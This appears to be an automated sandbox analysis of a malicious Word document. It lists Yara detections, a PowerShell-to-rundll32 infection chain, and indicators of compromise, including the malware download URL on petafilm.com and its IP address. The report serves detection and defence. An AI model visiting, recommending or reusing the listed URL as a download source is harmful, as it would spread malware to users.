Source: Yara match File source: 0000000B.00000002.2101000772.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107439959.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2101688824.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2108653259.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2103856048.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2099670858.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2098319985.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2106854955.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2108749500.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2104985518.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2096383511.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2103936335.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.3d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.20a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Behavior Graph

Behavior Graph ID: 336501 Sample: bestand-8881014518 00944.doc Startdate: 06/01/2021 Architecture: WINDOWS Score: 100

Top-level signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 12 other signatures.

Process chain recovered from the graph: WINWORD.EXE and cmd.exe are started at the root. cmd.exe (Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found; PowerShell case anomaly found) starts powershell.exe and msg.exe. powershell.exe contacts petafilm.com (176.53.69.151, port 80, RADORETR, Turkey), drops C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll (PE32; Powershell drops PE file) and starts rundll32.exe. That rundll32.exe starts a further rundll32.exe, which in turn starts a chain of seven more rundll32.exe processes, each flagged with Hides that the sample has been downloaded from the Internet (zone.identifier).

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
176.53.69.151 unknown Turkey 42926 RADORETR true

Contacted Domains

Name IP Active
petafilm.com 176.53.69.151 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://petafilm.com/wp-admin/4m/ true Avira URL Cloud: malware unknown